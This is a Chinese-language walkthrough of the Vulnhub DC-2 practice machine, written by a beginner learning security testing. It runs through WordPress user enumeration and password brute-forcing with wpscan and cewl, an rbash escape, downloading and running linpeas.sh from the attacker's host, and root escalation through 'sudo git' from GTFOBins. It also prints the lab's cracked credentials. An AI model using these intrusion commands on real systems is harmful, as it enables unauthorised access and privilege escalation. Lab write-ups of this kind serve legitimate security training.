Vulnhub靶机：DC-2

简介

Vulnhub是一个提供各种漏洞环境的靶场平台，大部分环境是做好的虚拟机镜像文件，镜像预先设计了多种漏洞，需要使用VMware或者VirtualBox运行。每个镜像会有破解的目标，挑战的目标是获取操作系统的root权限和查看flag。

部署方法

官网：https://www.vulnhub.com

1.在官网搜索你想要的镜像,然后下载【建议下载 (Mirror)版本】

2.下载好后解压得到.ova的文件，右击选择VMware进行打开

3.在弹出的框中，选择存放的位置，然后点击导入

4.最后等待导入完成，然后启动该虚拟机就可以了

5.DC-2需要在etc/hosts配置一下

一、信息收集

我是用kali的arp-scan，也可以用namp扫网段扫出来。这里可以用很多工具扫出来之举例一种。

arp-scan -I eth2 -l

-I 指定eth2这个网卡

-l 扫描出全部主机

我们知道靶机的IP地址在192.168.100.4后使用namp扫描靶机

nmap 192.168.100.4 -A -O -p 1-65535

-A 进行全面扫描，包括服务版本探测、操作系统检测等。

-O 进行操作系统检测，尝试识别远程主机的操作系统类型。

-p 指定要扫描的端口范围或特定端口，如1-65535或80,443。

这里观察到DC-2靶机开放了 80，7744。

80端口运行的是Wordpress的CMS。

浏览器验证一下。

因为是wordpress我们直接用现成的工具去扫描。

wpscan --url http://dc-2 --enumerate p,t,u

p是扫描网页中安装的插件

t是扫描网页中的主题。

u是扫描网页中的账户。

这里发现三个用户保存下来。

爆破的话还差一个密码字典。

cewl http://dc-2 -w passwd.txt

拿到密码字典后直接爆破。这里我使用的是wpscan自带的，当然也可以用hydra爆破。

wpscan --url "http://dc-2/wp-login.php?redirect_to=http%3A%2F%2Fdc-2%2Fwp-admin%2F&reauth=1" -U u.txt -P passwd.txt

拿到两个用户。

jerry / adipiscing
tom / parturient   

发现了Flag 2，提示我们wp里面没什么可以利用的了。

二，漏洞利用

那就ssh登录终端一下，在这里只有tom的可以登录，jerry的登陆不进去提示权限拒绝。

登录进tom后我们还要绕过rbash。随便找了个绕过的方法。

BASH_CMDS[a]=/bin/sh;a

/bin/bash

export PATH=$PATH:/bin/

export PATH=$PATH:/usr/bin

拿到权限后直接进tmp目录里拿脚本扫描。

使用wget获取也可以用curl。

linpeas.sh这个脚本是用于在渗透测试中进行特权升级和系统枚举。简单来说就是提权脚本。

Cerbersec (Cerbersec) · GitHub

作者大大的GitHub。

python3 -m http.server 100

本机先打开一个端口。

wget http://192.168.100.3:100/linpeas.sh

拿到后加权。

chmod +x linpeas.sh

加权后运行就好了。

./linpeas.sh

观察了一小会发现没什么可以利用的。那我们就转到jerry用户下。

从tom进入到jerry是可以的。继续运行linpeas.sh。

在jerry下我们就发现了可以提权的漏洞了。直接使用就好了。

从GTFOBins找到的。直接使用拿到root权限。

sudo git -p help config
!/bin/sh

这样就结束了。

后续

我感觉对我这种小白是不是有点太难了。。。